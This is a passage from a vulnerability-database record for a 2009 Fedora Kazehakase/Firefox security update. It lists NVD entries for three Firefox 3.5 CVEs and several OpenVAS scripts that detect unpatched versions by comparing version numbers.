ID FEDORA:9F0BA10F91F Type fedora Reporter Fedora Modified 2009-07-22T22:03:48
Description
Kazehakase is a Web browser which aims to provide a user interface that is truly user-friendly & fully customizable. This package uses Gecko for HTML rendering engine.
{"cve": [{"lastseen": "2021-02-02T05:40:03", "description": "js/src/jstracer.cpp in the Just-in-time (JIT) JavaScript compiler (aka TraceMonkey) in Mozilla Firefox 3.5 before 3.5.1 allows remote attackers to execute arbitrary code via certain use of the escape function that triggers access to uninitialized memory locations, as originally demonstrated by a document containing P and FONT elements.", "edition": 4, "cvss3": {}, "published": "2009-07-15T15:30:00", "title": "CVE-2009-2477", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2477"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:mozilla:firefox:3.5"], "id": "CVE-2009-2477", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2477", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:3.5:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:03", "description": "Mozilla Firefox 3.0.x, 3.5, and 3.5.1 on Windows allows remote attackers to cause a denial of service (uncaught exception and application crash) via a long Unicode string argument to the write method. NOTE: this was originally reported as a stack-based buffer overflow. NOTE: on Linux and Mac OS X, a crash resulting from this long string reportedly occurs in an operating-system library, not in Firefox.\nReference links provided indicate Denial of Service impact only.", "edition": 4, "cvss3": {}, "published": "2009-07-16T15:30:00", "title": "CVE-2009-2479", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2479"], "modified": "2018-10-10T19:40:00", "cpe": ["cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:firefox:3.0.17"], "id": "CVE-2009-2479", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2479", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:03", "description": "Mozilla Firefox 3.5 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via unspecified vectors, related to a \"flash bug.\"", "edition": 4, "cvss3": {}, "published": "2009-07-16T15:30:00", "title": "CVE-2009-2478", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2478"], "modified": "2009-08-07T05:22:00", "cpe": ["cpe:/a:mozilla:firefox:3.5"], "id": "CVE-2009-2478", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2478", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:3.5:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-25T10:56:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "The remote host is missing an update to firefox\nannounced via advisory FEDORA-2009-7898.", "modified": "2017-07-10T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:64465", "href": "http://plugins.openvas.org/nasl.php?oid=64465", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-7898 (firefox)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_7898.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-7898 (firefox)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Mozilla Firefox is an open-source web browser, designed for standards\ncompliance, performance and portability.\n\nUpdate Information:\n\nUpdate to new upstream Firefox version 3.5.1, fixing multiple security issues\ndetailed in the upstream advisories:\nhttp://www.mozilla.org/security/known-vulnerabilities/firefox35.html#firefox3.5.1\n\nUpdate also includes all packages depending on gecko-libs rebuilt against\nnew version of Firefox / XULRunner.\n\nChangeLog:\n\n* Fri Jul 17 2009 Martin Stransky - 3.5.1-1\n- Updated to 3.5.1.\n* Tue Jul 7 2009 Jan Horak - 3.5-2\n- Updated icon\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update firefox' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-7898\";\ntag_summary = \"The remote host is missing an update to firefox\nannounced via advisory FEDORA-2009-7898.\";\n\n\n\nif(description)\n{\n script_id(64465);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2477\", \"CVE-2009-2478\", \"CVE-2009-2479\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-7898 (firefox)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511228\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.5.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firefox-debuginfo\", rpm:\"firefox-debuginfo~3.5.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2477", "CVE-2009-2478", "CVE-2009-2479"], "description": "The remote host is missing an update to firefox\nannounced via advisory FEDORA-2009-7898.", "modified": "2018-04-06T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:136141256231064465", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064465", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-7898 (firefox)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_7898.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-7898 (firefox)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Mozilla Firefox is an open-source web browser, designed for standards\ncompliance, performance and portability.\n\nUpdate Information:\n\nUpdate to new upstream Firefox version 3.5.1, fixing multiple security issues\ndetailed in the upstream advisories:\nhttp://www.mozilla.org/security/known-vulnerabilities/firefox35.html#firefox3.5.1\n\nUpdate also includes all packages depending on gecko-libs rebuilt against\nnew version of Firefox / XULRunner.\n\nChangeLog:\n\n* Fri Jul 17 2009 Martin Stransky - 3.5.1-1\n- Updated to 3.5.1.\n* Tue Jul 7 2009 Jan Horak - 3.5-2\n- Updated icon\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update firefox' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-7898\";\ntag_summary = \"The remote host is missing an update to firefox\nannounced via advisory FEDORA-2009-7898.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64465\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2477\", \"CVE-2009-2478\", \"CVE-2009-2479\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-7898 (firefox)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511228\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.5.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firefox-debuginfo\", rpm:\"firefox-debuginfo~3.5.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-29T22:26:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2478", "CVE-2009-2479"], "description": "The host is installed with Mozilla Firefox browser and is prone\n to Buffer Overflow vulnerability.", "modified": "2020-04-27T00:00:00", "published": "2009-07-18T00:00:00", "id": "OPENVAS:1361412562310800846", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800846", "type": "openvas", "title": "Mozilla Firefox Buffer Overflow Vulnerability - July09 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox Buffer Overflow Vulnerability - July09 (Windows)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800846\");\n script_version(\"2020-04-27T09:00:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 09:00:11 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-07-18 09:37:41 +0200 (Sat, 18 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cve_id(\"CVE-2009-2478\", \"CVE-2009-2479\");\n script_bugtraq_id(35707);\n script_name(\"Mozilla Firefox Buffer Overflow Vulnerability - July09 (Windows)\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/9158\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/51729\");\n script_xref(name:\"URL\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=503286\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_firefox_detect_portable_win.nasl\");\n script_mandatory_keys(\"Firefox/Win/Ver\");\n script_tag(name:\"impact\", value:\"Successful attacks will let attackers to can cause Denial of Service to the\n legitimate user.\");\n script_tag(name:\"affected\", value:\"Firefox version 3.5.1 and prior on Windows\");\n script_tag(name:\"insight\", value:\"- A NULL pointer dereference error exists due an unspecified vectors, related\n to a 'flash bug.' which can cause application crash.\n\n - Stack-based buffer overflow error is caused by sending an overly long string\n argument to the 'document.write' method.\");\n script_tag(name:\"solution\", value:\"Upgrade to Firefox version 3.6.3 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Mozilla Firefox browser and is prone\n to Buffer Overflow vulnerability.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.mozilla.com/en-US/firefox/upgrade.html\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nffVer = get_kb_item(\"Firefox/Win/Ver\");\nif(!ffVer){\n exit(0);\n}\n\nif(version_is_less_equal(version:ffVer, test_version:\"3.5.1\")){\n report = report_fixed_ver(installed_version:ffVer, vulnerable_range:\"Less than or equal to 3.5.1\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-02T21:13:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2478", "CVE-2009-2479"], "description": "The host is installed with Mozilla Firefox browser and is prone\n to Buffer Overflow vulnerability.", "modified": "2016-12-28T00:00:00", "published": "2009-07-18T00:00:00", "id": "OPENVAS:800847", "href": "http://plugins.openvas.org/nasl.php?oid=800847", "type": "openvas", "title": "Mozilla Firefox Buffer Overflow Vulnerability - July09 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_firefox_bof_vuln_jul09_lin.nasl 4865 2016-12-28 16:16:43Z teissa $\n#\n# Mozilla Firefox Buffer Overflow Vulnerability - July09 (Linux)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful attacks will let attackers to can cause Denial of Service to the\n legitimate user.\n Impact Level: Application\";\ntag_affected = \"Firefox version 3.5.1 and prior on Linux\";\ntag_insight = \"- A NULL pointer dereference error exists due an unspecified vectors, related\n to a 'flash bug.' which can cause application crash.\n - Stack-based buffer overflow error is caused by sending an overly long string\n argument to the 'document.write' method.\";\ntag_solution = \"Upgrade to Firefox version 3.6.3 or later,\n For updates refer to http://www.mozilla.com/en-US/firefox/upgrade.html\";\ntag_summary = \"The host is installed with Mozilla Firefox browser and is prone\n to Buffer Overflow vulnerability.\";\n\nif(description)\n{\n script_id(800847);\n script_version(\"$Revision: 4865 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-28 17:16:43 +0100 (Wed, 28 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-18 09:37:41 +0200 (Sat, 18 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cve_id(\"CVE-2009-2478\", \"CVE-2009-2479\");\n script_bugtraq_id(35707);\n script_name(\"Mozilla Firefox Buffer Overflow Vulnerability - July09 (Linux)\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/9158\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/51729\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.mozilla.org/show_bug.cgi?id=503286\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_firefox_detect_lin.nasl\");\n script_require_keys(\"Firefox/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nffVer = get_kb_item(\"Firefox/Linux/Ver\");\nif(!ffVer){\n exit(0);\n}\n\n# Grep for Firefox version <= 3.5.1\nif(version_is_less_equal(version:ffVer, test_version:\"3.5.1\")){\n security_message(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2478", "CVE-2009-2479"], "description": "The host is installed with Mozilla Firefox browser and is prone\n to Buffer Overflow vulnerability.", "modified": "2016-12-28T00:00:00", "published": "2009-07-18T00:00:00", "id": "OPENVAS:800846", "href": "http://plugins.openvas.org/nasl.php?oid=800846", "type": "openvas", "title": "Mozilla Firefox Buffer Overflow Vulnerability - July09 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_firefox_bof_vuln_jul09_win.nasl 4865 2016-12-28 16:16:43Z teissa $\n#\n# Mozilla Firefox Buffer Overflow Vulnerability - July09 (Windows)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful attacks will let attackers to can cause Denial of Service to the\n legitimate user.\n Impact Level: Application\";\ntag_affected = \"Firefox version 3.5.1 and prior on Windows\";\ntag_insight = \"- A NULL pointer dereference error exists due an unspecified vectors, related\n to a 'flash bug.' which can cause application crash.\n - Stack-based buffer overflow error is caused by sending an overly long string\n argument to the 'document.write' method.\";\ntag_solution = \"Upgrade to Firefox version 3.6.3 or later,\n For updates refer to http://www.mozilla.com/en-US/firefox/upgrade.html\";\ntag_summary = \"The host is installed with Mozilla Firefox browser and is prone\n to Buffer Overflow vulnerability.\";\n\nif(description)\n{\n script_id(800846);\n script_version(\"$Revision: 4865 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-28 17:16:43 +0100 (Wed, 28 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-18 09:37:41 +0200 (Sat, 18 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cve_id(\"CVE-2009-2478\", \"CVE-2009-2479\");\n script_bugtraq_id(35707);\n script_name(\"Mozilla Firefox Buffer Overflow Vulnerability - July09 (Windows)\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/9158\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/51729\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.mozilla.org/show_bug.cgi?id=503286\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_firefox_detect_win.nasl\");\n script_require_keys(\"Firefox/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nffVer = get_kb_item(\"Firefox/Win/Ver\");\nif(!ffVer){\n exit(0);\n}\n\n# Grep for Firefox version <= 3.5.1\nif(version_is_less_equal(version:ffVer, test_version:\"3.5.1\")){\n security_message(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2020-04-29T22:26:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2478", "CVE-2009-2479"], "description": "The host is installed with Mozilla Firefox browser and is prone\n to Buffer Overflow vulnerability.", "modified": "2020-04-27T00:00:00", "published": "2009-07-18T00:00:00", "id": "OPENVAS:1361412562310800847", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800847", "type": "openvas", "title": "Mozilla Firefox Buffer Overflow Vulnerability - July09 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox Buffer Overflow Vulnerability - July09 (Linux)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800847\");\n script_version(\"2020-04-27T09:00:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 09:00:11 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-07-18 09:37:41 +0200 (Sat, 18 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cve_id(\"CVE-2009-2478\", \"CVE-2009-2479\");\n script_bugtraq_id(35707);\n script_name(\"Mozilla Firefox Buffer Overflow Vulnerability - July09 (Linux)\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/9158\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/51729\");\n script_xref(name:\"URL\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=503286\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_firefox_detect_lin.nasl\");\n script_mandatory_keys(\"Firefox/Linux/Ver\");\n script_tag(name:\"impact\", value:\"Successful attacks will let attackers to can cause Denial of Service to the\n legitimate user.\");\n 